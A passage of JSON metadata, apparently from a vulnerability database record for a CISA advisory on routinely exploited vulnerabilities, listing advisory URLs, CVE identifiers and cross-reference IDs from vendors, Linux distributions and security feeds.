"https://logging.apache.org/log4j/2.x/security.html", "https://www.cisa.gov/uscert/ncas/alerts/aa21-356a", "https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance", "https://www.cyber.gc.ca/en/alerts/active-exploitation-apache-log4j-vulnerability", "https://nvd.nist.gov/vuln/detail/CVE-2021-40539", "https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6114-security-fix-release", "https://www.cisa.gov/uscert/ncas/alerts/aa21-259a", "https://www.cyber.gc.ca/en/alerts/zoho-security-advisory", "https://nvd.nist.gov/vuln/detail/CVE-2021-40444", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444", "https://nvd.nist.gov/vuln/detail/CVE-2021-34527", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527", "https://www.cisa.gov/uscert/ncas/alerts/aa22-074a", "https://www.cyber.gc.ca/en/alerts/windows-print-spooler-vulnerability-remains-unpatched", "https://nvd.nist.gov/vuln/detail/CVE-2021-34523", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523", "https://www.cisa.gov/uscert/ncas/alerts/aa21-321a", "https://www.cyber.gov.au/acsc/view-all-content/alerts/microsoft-exchange-proxyshell-targeting-australia", "https://nvd.nist.gov/vuln/detail/CVE-2021-34473", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473", "https://nvd.nist.gov/vuln/detail/CVE-2021-31207", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207", "https://nvd.nist.gov/vuln/detail/CVE-2021-3156", "https://www.sudo.ws/releases/stable/#1.9.5p2", "https://nvd.nist.gov/vuln/detail/CVE-2021-27852", "https://nvd.nist.gov/vuln/detail/CVE-2021-27065", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065", "https://www.cisa.gov/uscert/ncas/alerts/aa21-062a", "https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2021-002-active-exploitation-vulnerable-microsoft-exchange-servers", "https://www.cyber.gc.ca/en/alerts/active-exploitation-microsoft-exchange-vulnerabilities", "https://nvd.nist.gov/vuln/detail/CVE-2021-26858", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858", "https://nvd.nist.gov/vuln/detail/CVE-2021-26857", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857", "https://nvd.nist.gov/vuln/detail/CVE-2021-26855", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855", "https://nvd.nist.gov/vuln/detail/CVE-2021-26084", "https://jira.atlassian.com/browse/CONFSERVER-67940", "https://www.cyber.gov.au/acsc/view-all-content/alerts/remote-code-execution-vulnerability-present-certain-versions-atlassian-confluence", "https://www.cyber.gc.ca/en/alerts/atlassian-security-advisory", "https://nvd.nist.gov/vuln/detail/CVE-2021-22893", "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/", "https://www.cyber.gc.ca/en/alerts/active-exploitation-pulse-connect-secure-vulnerabilities", "https://nvd.nist.gov/vuln/detail/CVE-2021-20016", "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0001", "https://nvd.nist.gov/vuln/detail/CVE-2021-1675", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675", "https://www.cyber.gc.ca/en/alerts/windows-print-spooler-vulnerability-remains-unpatched", "https://nvd.nist.gov/vuln/detail/CVE-2020-2509", "https://www.qnap.com/en/security-advisory/qsa-21-05", "https://www.qnap.com/en/security-advisory/qsa-21-05", "https://nvd.nist.gov/vuln/detail/CVE-2020-1472", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472", "https://www.cyber.gov.au/acsc/view-all-content/alerts/netlogon-elevation-privilege-vulnerability-cve-2020-1472", "https://www.cisa.gov/uscert/ncas/alerts/aa20-283a", "https://www.cyber.gc.ca/en/alerts/microsoft-netlogon-elevation-privilege-vulnerability-cve-2020-1472", "https://nvd.nist.gov/vuln/detail/CVE-2020-0688", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688", "https://www.cisa.gov/uscert/ncas/alerts/aa20-258a", "https://www.cisa.gov/uscert/ncas/alerts/aa22-047a", "https://www.cyber.gc.ca/en/alerts/microsoft-exchange-validation-key-remote-code-execution-vulnerability", "https://nvd.nist.gov/vuln/detail/CVE-2019-19781", "https://support.citrix.com/article/CTX267027", "https://www.cisa.gov/uscert/ncas/alerts/aa20-283a", "https://www.cisa.gov/uscert/ncas/alerts/aa20-258a", "https://www.cyber.gc.ca/en/alerts/detecting-compromises-relating-citrix-cve-2019-19781-0", "https://nvd.nist.gov/vuln/detail/CVE-2019-18935", "https://docs.telerik.com/devtools/aspnet-ajax/knowledge-base/common-allows-javascriptserializer-deserialization", "https://www.cyber.gov.au/acsc/view-all-content/alerts/active-exploitation-vulnerability-microsoft-internet-information-services", "https://nvd.nist.gov/vuln/detail/CVE-2019-11510", "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/", "https://www.cisa.gov/uscert/ncas/alerts/aa20-010a", "https://www.cisa.gov/uscert/ncas/alerts/aa20-258a", "https://www.cyber.gov.au/acsc/view-all-content/advisories/2019-129-recommendations-mitigate-vulnerability-pulse-connect-secure-vpn-software", "https://www.cisa.gov/uscert/ncas/alerts/aa20-283a", "https://www.cyber.gc.ca/en/alerts/apt-actors-target-us-and-allied-networks-nsacisafbi", "https://nvd.nist.gov/vuln/detail/CVE-2018-13379", "https://www.fortiguard.com/psirt/FG-IR-20-233", "https://www.cisa.gov/uscert/ncas/alerts/aa22-047a", "https://www.cisa.gov/uscert/ncas/alerts/aa21-321a", "https://www.cisa.gov/uscert/ncas/alerts/aa20-283a", "https://www.cyber.gov.au/acsc/view-all-content/alerts/apt-exploitation-fortinet-vulnerabilities", "https://www.cyber.gc.ca/en/alerts/exploitation-fortinet-fortios-vulnerabilities-cisa-fbi", "https://nvd.nist.gov/vuln/detail/CVE-2018-0171", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2#fixed", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2#fixed", "https://www.cyber.gc.ca/en/alerts/action-required-secure-cisco-ios-and-ios-xe-smart-install-feature", "https://nvd.nist.gov/vuln/detail/CVE-2017-11882", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882", "https://www.cyber.gc.ca/en/alerts/microsoft-office-security-update", "https://nvd.nist.gov/vuln/detail/CVE-2017-0199", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199", "https://www.cyber.gc.ca/en/alerts/microsoft-security-updates", "https://www.fbi.gov/contact-us/field-offices", "https://www.cyber.gov.au/", "https://www.ncsc.gov.uk/section/about-this-website/contact-us", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a", "https://www.facebook.com/CISA", "https://twitter.com/CISAgov", "https://www.linkedin.com/company/cybersecurity-and-infrastructure-security-agency", "https://www.youtube.com/@cisagov", "https://www.instagram.com/cisagov", "https://www.dhs.gov/accessibility", "https://www.dhs.gov/performance-financial-reports", "https://www.dhs.gov", "https://www.dhs.gov/foia", "https://www.oig.dhs.gov/", "https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?topic_id=USDHSCISA_138", "https://www.whitehouse.gov/", "https://www.usa.gov/"], "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2018-0171", "CVE-2018-13379", "CVE-2019-11510", "CVE-2019-18935", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-1472", "CVE-2020-2509", "CVE-2021-1675", "CVE-2021-20016", "CVE-2021-20038", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-27852", "CVE-2021-31207", "CVE-2021-3156", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35464", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-42475", "CVE-2022-47966"], "immutableFields": [], "lastseen": "2023-09-23T06:47:11", "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "0daydb", "idList": ["0DAYDB:137B89027DF0ADFC87056CE176A77441"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:09A31B56FFEA13FBA5985C1B2E66133B", "AKAMAIBLOG:30D20162B95C09229EEF2C09C5D98FCA", "AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F", "AKAMAIBLOG:70514CEAD92A7A0C6AEE397520B2E557", "AKAMAIBLOG:7E872DA472DB19F259EC6E0D8CA018FF", "AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D", "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3", "AKAMAIBLOG:BB43372E19E8CF90A965E98130D0C070", "AKAMAIBLOG:EC11EFBC73E974C28D27A64B77E1830E"]}, {"type": "almalinux", "idList": ["ALSA-2021:0218", "ALSA-2021:1647"]}, {"type": "alpinelinux", "idList": ["ALPINE:CVE-2020-1472", "ALPINE:CVE-2021-3156"]}, {"type": "altlinux", "idList": ["0666BB8481B59C8FF60D851348A7369C", "8907B92479FC3D90FF62A4920C4D6940", "FD4483A7DF9B7189B007C0C774CA4588"]}, {"type": "amazon", "idList": ["ALAS-2021-1469", "ALAS-2021-1478", "ALAS-2021-1553", "ALAS-2021-1554", "ALAS-2022-1580", "ALAS-2022-1601", "ALAS2-2021-1585", "ALAS2-2021-1590", "ALAS2-2021-1649", "ALAS2-2021-1730", "ALAS2-2021-1731", "ALAS2-2021-1732", "ALAS2-2022-1739", "ALAS2-2022-1773", "ALAS2-2022-1806"]}, {"type": "amd", "idList": ["AMD-SB-1034"]}, {"type": "apple", "idList": ["APPLE:251C897D47AD6A2DB0B7E3792A81C425", "APPLE:87ECB5906FD123665AEE056A2BC685F6", "APPLE:HT212177"]}, {"type": "archlinux", "idList": ["ASA-202009-17", "ASA-202101-25"]}, {"type": "arista", "idList": ["ARISTA:0070"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-67940", "CONFSERVER-67940", "CONFSERVER-68844", "CRUC-8529", "FE-7368"]}, {"type": "attackerkb", "idList": ["AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94", "AKB:0C69B33C-2322-4075-BE16-A92593B75107", "AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "AKB:12F253E0-F6F2-4628-A989-57A36E8C7026", "AKB:15082D97-CB46-4433-9BA3-6C37DC148340", "AKB:1AE51720-4534-42A8-879C-01FFE347E837", "AKB:1BA7DC74-F17D-4C34-9A6C-2F6B39787AA2", "AKB:1FA9A53C-0452-4411-96C9-C0DD833F8D18", "AKB:21AD0A36-A0AA-486B-A379-B47156286E9E", "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:3191CCF9-DA8E-43DF-8152-1E3A5D1A3C45", "AKB:35B88369-C440-49C0-98FF-C50E258FB32C", "AKB:398CAD69-31E4-4276-B510-D93B2C648A74", "AKB:462BB7BE-5D1C-4847-AE1A-07B008F34C9D", "AKB:4C137002-9580-4593-83DB-D4E636E1AEFB", "AKB:587F1997-1604-43C4-9132-E5DABAECA5C1", "AKB:5BE82C1E-061F-4C04-93A2-1C15BBDE9337", "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "AKB:5E706DDA-98EC-49CA-AB21-4814DAF26444", "AKB:67AA97AC-E920-4D0C-9B50-6B1C42E683D1", "AKB:67DD67D3-33BC-455C-98A3-7DD0E1D4613D", "AKB:6AB45633-1353-4F19-B0F2-33448E9488A2", "AKB:6EEE0386-669E-41EA-AABF-5685D2724967", "AKB:6F1D646E-2CDB-4382-A212-30728A7DB899", "AKB:71F77351-1AE5-4161-8836-D26680828466", "AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800", "AKB:77E58EB9-547A-4137-BD9B-C2E5E487FA8E", "AKB:78B79B61-E949-48E9-BA41-A45CF0E9EA6C", "AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:7C700F0C-8A21-44FE-87D6-4E1601FE9D24", "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486", "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "AKB:8E9F0DC4-BC72-4340-B70E-5680CA968D2B", "AKB:90047E82-FDD8-47DB-9552-50D104A34230", "AKB:90DDDBF9-EA58-4470-B821-C35007A64BD6", "AKB:91756851-9B25-4801-B911-E3226A0656B5", "AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917", "AKB:A2C0FB81-B0C3-4850-9393-E52427779FBF", "AKB:AA680CD3-76EC-4846-9C49-ADBE618F13BA", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:B1318EAC-2E60-4695-B63B-2D10DAAA5B0E", "AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B", "AKB:B50A8CA6-40B8-467B-A4B8-29A68F45B8A2", "AKB:B54A15A1-8D06-4902-83F9-DC10E40FA81A", "AKB:B8A2FA01-8796-4335-8BF4-45147E14AFC9", "AKB:BD645B28-C99E-42EA-A606-832F4F534945", "AKB:BDCF4DDE-714E-40C0-B4D9-2B4ECBAD31FF", "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "AKB:C4CD066B-E590-48F0-96A7-FFFAFC3D23CC", "AKB:C91B7584-3733-4651-9EC0-BF456C971127", "AKB:CDA9C43E-015D-4B04-89D3-D6CABC5729B9", "AKB:D9826725-69EA-420F-9AB1-F16E3F0FDD68", "AKB:DEB21742-F92B-4F5A-931C-082502383C34", "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B", "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D", "AKB:ED05D93E-5B20-4B44-BAC8-C4CB5B46254A", "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876", "AKB:F05BE8C2-C144-45BE-BF46-5867A2CAAF15", "AKB:F2A441BA-2246-446C-9B34-400B2F3DD77B", "AKB:F48CAEEE-E809-405D-B7AD-48D94140C67D", "AKB:F7CCD0B7-220B-49E5-A4DF-27E26B64A3F0", "AKB:FB27076C-2538-4849-9291-199007E30708", "AKB:FF495201-9E29-4561-AE45-888E59E30E1B"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "AVLEONOV:30285D85FDB40C8D55F6A24D9D446ECF", "AVLEONOV:36BA0DE03DB6F8D0C96B6861C9A07473", "AVLEONOV:44DF3C4B3D05A7DC39FB6314F5D94892", "AVLEONOV:469525DB37AAC7A2242EE80C1BCBC8DB", "AVLEONOV:4E65E4AC928647D5E246B06B953BBC6F", "AVLEONOV:4FCA3B316DF1BAA7BC038015245D9813", "AVLEONOV:56C5888A0A7E36482CFC39A438BADAB3", "AVLEONOV:5945665DFA613F7707360C10CED8C916", "AVLEONOV:6A714F9BC2BBE696D3586B2629169491", "AVLEONOV:7E0DF6DEBB35FB55F6B4D33A7262A422", "AVLEONOV:8378A14587C08A1636BEE66608020687", "AVLEONOV:89C75127789AC2C132A3AA403F035902", "AVLEONOV:93A5CCFA19B815AE15942F533FFD65C4", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34", "AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:F17F36C3CC642EBDC27E43900FE3905E", "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246"]}, {"type": "canvas", "idList": ["NETSCALER_TRAVERSAL_RCE", "OFFICE_WSDL", "OWA_RCE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:19B4E04F8F1723A4F28FA7A8354698AF", "CARBONBLACK:91F55D2B8B2999589579EACB1542A3E9", "CARBONBLACK:A526657711947788A54505B0330C16A0", "CARBONBLACK:C9B38F7962606C41AA16ECBD4E48D712", "CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD", "CARBONBLACK:F099654AA95F6498DB33414802DBA792", "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756"]}, {"type": "centos", "idList": ["CESA-2020:5439", "CESA-2021:0221"]}, {"type": "cert", "idList": ["VU:131152", "VU:213092", "VU:383432", "VU:421280", "VU:490028", "VU:619785", "VU:706695", "VU:794544", "VU:921560", "VU:927237", "VU:930724"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0251", "CPAI-2017-1009", "CPAI-2018-0193", "CPAI-2018-1187", "CPAI-2019-1097", "CPAI-2019-1653", "CPAI-2019-1914", "CPAI-2020-0104", "CPAI-2020-0872", "CPAI-2020-1095", "CPAI-2021-0099", "CPAI-2021-0100", "CPAI-2021-0106", "CPAI-2021-0107", "CPAI-2021-0376", "CPAI-2021-0461", "CPAI-2021-0465", "CPAI-2021-0476", "CPAI-2021-0548", "CPAI-2021-0554", "CPAI-2021-0877", "CPAI-2021-0879", "CPAI-2021-0894", "CPAI-2021-0900", "CPAI-2021-0936", "CPAI-2021-1065", "CPAI-2021-1113", "CPAI-2021-1174"]}, {"type": "checkpoint_security", "idList": ["CPS:SK171751", "CPS:SK176865"]}, {"type": "cisa", "idList": ["CISA:006B1DC6A817621E16EEB4560519A418", "CISA:01AC83B2C29761024423083A8BE9CE80", "CISA:134C272F26FB005321448C648224EB02", "CISA:16DE226AFC5A22020B20927D63742D98", "CISA:177CDBFAB8460E0C0E46679B383C5C2F", "CISA:18E5825084F7681AD375ACB5B1270280", "CISA:24BBE0D109CEB29CF9FC28CEA2AD0CFF", "CISA:28BCD901AF6661FE02928495E4D03129", "CISA:2B970469D89016F563E142BE209443D8", "CISA:2D62C340878780A9844A8FFDFA548783", "CISA:367C27124C09604830E0725F5F3123F7", "CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:3A09D1755051967FC65BD11A814E9167", "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "CISA:45B6D68A097309E99D8E7192B1E8A8BE", "CISA:4F4185688CEB9B9416A98FE75E7AFE02", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:6C836D217FB0329B2D68AD71789D1BB0", "CISA:6C962B804E593B231FDE50912F4D093A", "CISA:765265E5BF9328E9BAF09F93A1684580", "CISA:7E93687DEED7F2EA7EFAEBA997B30A5D", "CISA:7FB0A467C0EB89B6198A58418B43D50C", "CISA:8367DA0C1A6F51FB2D817745BB204C48", "CISA:8809AF4B96861275A43448FB64E686D1", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:8C51810D4AACDCCDBF9D526B4C21660C", "CISA:906D00DDCD25874F8A28FE348820F80A", "CISA:918B5EC3622C761B0424597D3F7AFF7C", "CISA:91DA945EA20AF1A221FDE02A2D9CE315", "CISA:920F1DA8584B18459D4963D91C8DDA33", "CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB", "CISA:B788AAE055F3DE2C255FCC0E7BE16B4B", "CISA:C70D91615E3DC8B589B493118D474566", "CISA:CB32DB4C2EA92462F387E1DA6C08F57E", "CISA:D7188D434879621A3A83E708590EAE42", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C", "CISA:E5A33B5356175BB63C2EFA605346F8C7", "CISA:F0D9A1ED5C31628B8E6D1E5F3AD609C4", "CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2017-0199", "CISA-KEV-CVE-2017-11882", "CISA-KEV-CVE-2018-0171", "CISA-KEV-CVE-2018-13379", "CISA-KEV-CVE-2019-11510", "CISA-KEV-CVE-2019-18935", "CISA-KEV-CVE-2019-19781", "CISA-KEV-CVE-2020-0688", "CISA-KEV-CVE-2020-1472", "CISA-KEV-CVE-2020-2509", "CISA-KEV-CVE-2021-1675", "CISA-KEV-CVE-2021-20016", "CISA-KEV-CVE-2021-20038", "CISA-KEV-CVE-2021-21972", "CISA-KEV-CVE-2021-21985", "CISA-KEV-CVE-2021-22893", "CISA-KEV-CVE-2021-26084", "CISA-KEV-CVE-2021-26855", "CISA-KEV-CVE-2021-26857", "CISA-KEV-CVE-2021-26858", "CISA-KEV-CVE-2021-27065", "CISA-KEV-CVE-2021-27101", "CISA-KEV-CVE-2021-27102", "CISA-KEV-CVE-2021-27103", "CISA-KEV-CVE-2021-27104", "CISA-KEV-CVE-2021-27852", "CISA-KEV-CVE-2021-31207", "CISA-KEV-CVE-2021-3156", "CISA-KEV-CVE-2021-34473", "CISA-KEV-CVE-2021-34523", "CISA-KEV-CVE-2021-34527", "CISA-KEV-CVE-2021-35464", "CISA-KEV-CVE-2021-40444", "CISA-KEV-CVE-2021-40539", "CISA-KEV-CVE-2021-42237", "CISA-KEV-CVE-2021-44228", "CISA-KEV-CVE-2021-45046", "CISA-KEV-CVE-2022-42475", "CISA-KEV-CVE-2022-47966"]}, {"type": "cisco", "idList": ["CISCO-SA-20180328-SMI2", "CISCO-SA-APACHE-LOG4J-QRUKNEBD", "CISCO-SA-SUDO-PRIVESC-JAN2021-QNYQFCM"]}, {"type": "citrix", "idList": ["CTX267027", "CTX335705"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:690C01663F820378948F8CF2E2405F72", "CFOUNDRY:E2EC45D69AA3550DE981BAC4E63015D3"]}, {"type": "cloudlinux", "idList": ["CLSA-2021:1611743864"]}, {"type": "cnvd", "idList": ["CNVD-2021-101202", "CNVD-2021-69088", "CNVD-2022-87170"]}, {"type": "cve", "idList": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-11884", "CVE-2018-0171", "CVE-2018-13379", "CVE-2019-11510", "CVE-2019-18935", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-1472", "CVE-2020-2509", "CVE-2021-1675", "CVE-2021-20016", "CVE-2021-20038", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-26084", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-27852", "CVE-2021-3100", "CVE-2021-31196", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-3156", "CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35464", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-4104", "CVE-2021-4125", "CVE-2021-42237", "CVE-2021-44228", "CVE-2021-44530", "CVE-2021-45046", "CVE-2022-0070", "CVE-2022-23848", "CVE-2022-33915", "CVE-2022-42475", "CVE-2022-47966"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2463-1:1381E", "DEBIAN:DLA-2534-1:1EFB7", "DEBIAN:DLA-2534-1:AA5E2", "DEBIAN:DLA-2842-1:95CB4", "DEBIAN:DSA-4839-1:0839A", "DEBIAN:DSA-4839-1:3997C", "DEBIAN:DSA-5020-1:32A64", "DEBIAN:DSA-5022-1:D26EE"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-1472", "DEBIANCVE:CVE-2021-3156", "DEBIANCVE:CVE-2021-4104", "DEBIANCVE:CVE-2021-44228", "DEBIANCVE:CVE-2021-45046"]}, {"type": "dsquare", "idList": ["E-688", "E-691"]}, {"type": "exploitdb", "idList": ["EDB-ID:41894", "EDB-ID:41934", "EDB-ID:43163", "EDB-ID:44263", "EDB-ID:47287", "EDB-ID:47288", "EDB-ID:47297", "EDB-ID:47793", "EDB-ID:47901", "EDB-ID:47902", "EDB-ID:47913", "EDB-ID:47930", "EDB-ID:48153", "EDB-ID:48168", "EDB-ID:49071", "EDB-ID:49521", "EDB-ID:49522", "EDB-ID:49602", "EDB-ID:49879", "EDB-ID:49895", "EDB-ID:50056", "EDB-ID:50131", "EDB-ID:50243", "EDB-ID:50590", "EDB-ID:50592", "EDB-ID:51183"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "EXPLOITPACK:1B366A9B404A79180DAB2A9C4AE015B0", "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "EXPLOITPACK:26C6702FE71DE1FE3096B330AA74AD07", "EXPLOITPACK:6EF33E509C6C5002F8E81022F84C01B5", "EXPLOITPACK:71F27F0B85E2B8F7A6B9272A3136DA05", "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "EXPLOITPACK:AE2D3F648B410F57DC5F105EDA166E2B", "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171", "EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB", "EXPLOITPACK:E222442D181419B052AACE6DA4BC8485"]}, {"type": "f5", "idList": ["F5:K19026212", "F5:K24554520", "F5:K32171392", "F5:K34002344", "F5:K86488846", "F5:K93951507"]}, {"type": "fedora", "idList": ["FEDORA:0A343304CB93", "FEDORA:353D73154ABE", "FEDORA:38D8230C58CD", "FEDORA:4A64830CFCDC", "FEDORA:548FD3102AB0", "FEDORA:59AA230A7074", "FEDORA:60E3A30D1484", "FEDORA:95A5B306879A", "FEDORA:A5A703103140", "FEDORA:D8A0E3053060"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "FIREEYE:327A8F88F73C7D036A5D128A75C86E11", "FIREEYE:35D0439B3D476357F4D2F51F3D5CD294", "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "FIREEYE:4B85E44D28C8512270923B36728CBD59", "FIREEYE:61901D6D8B7FE74193954DA723EA43FC", "FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "FIREEYE:85C9D5EC8130810CFB601AF3559E0DB6", "FIREEYE:8926956380F9C38D0DE9955F5D9CBE06", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED", "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "FIREEYE:92F27B3F6B5FC8C7C22B088678232819", "FIREEYE:9503F430A48297769A46076960747B2F", "FIREEYE:9CF80EFF287EE06F7EC0094727FE9C26", "FIREEYE:A19A2394490AB386D95215A17EEA2FC0", "FIREEYE:A728AA190E170AFDE8BF140059E0D0D5", "FIREEYE:AA5B50E5C593F4E6EFF300E3DE9EDB85", "FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:BFB36D22F20651C632D25AA20588E904", "FIREEYE:C650A7016EEAD895903FB350719E53E3", "FIREEYE:D64714BFF80E34308579150D4C839557", "FIREEYE:D872F9CFF7406BD5A933C3819DBB6645", "FIREEYE:DE7D327A091FDB2A6C8A4AF7B6F71076", "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF", "FIREEYE:E28F2F7E1B1F4BDA33635C841E315BCA", "FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644", "FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD", "FIREEYE:F3E71742D8E5D617D6B77A2DB930882F", "FIREEYE:F58154E35F166E87B591935191A7EA69", "FIREEYE:FC60CAB5C936FF70E94A7C9307805695"]}, {"type": "fortinet", "idList": ["FG-IR-18-384", "FG-IR-20-233", "FG-IR-21-245", "FG-IR-22-398"]}, {"type": "freebsd", "idList": ["1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "24ACE516-FAD7-11EA-8D8C-005056A311D1", "2BAB995F-36D4-11EA-9DAD-002590ACAE31", "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "4B1AC5A3-5BD4-11EC-8602-589CFC007716", "515DF85A-5CD7-11EC-A16D-001517A2E1A4", "650734B2-7665-4170-9A0A-EECED5E10A5E", "93A1C9A7-5BEF-11EC-A47A-001517A2E1A4", "F3CF4B33-6013-11EB-9A0E-206A8A720317"]}, {"type": "gentoo", "idList": ["GLSA-202012-24", "GLSA-202101-33"]}, {"type": "github", "idList": ["GHSA-3QPM-H9CH-PX3C", 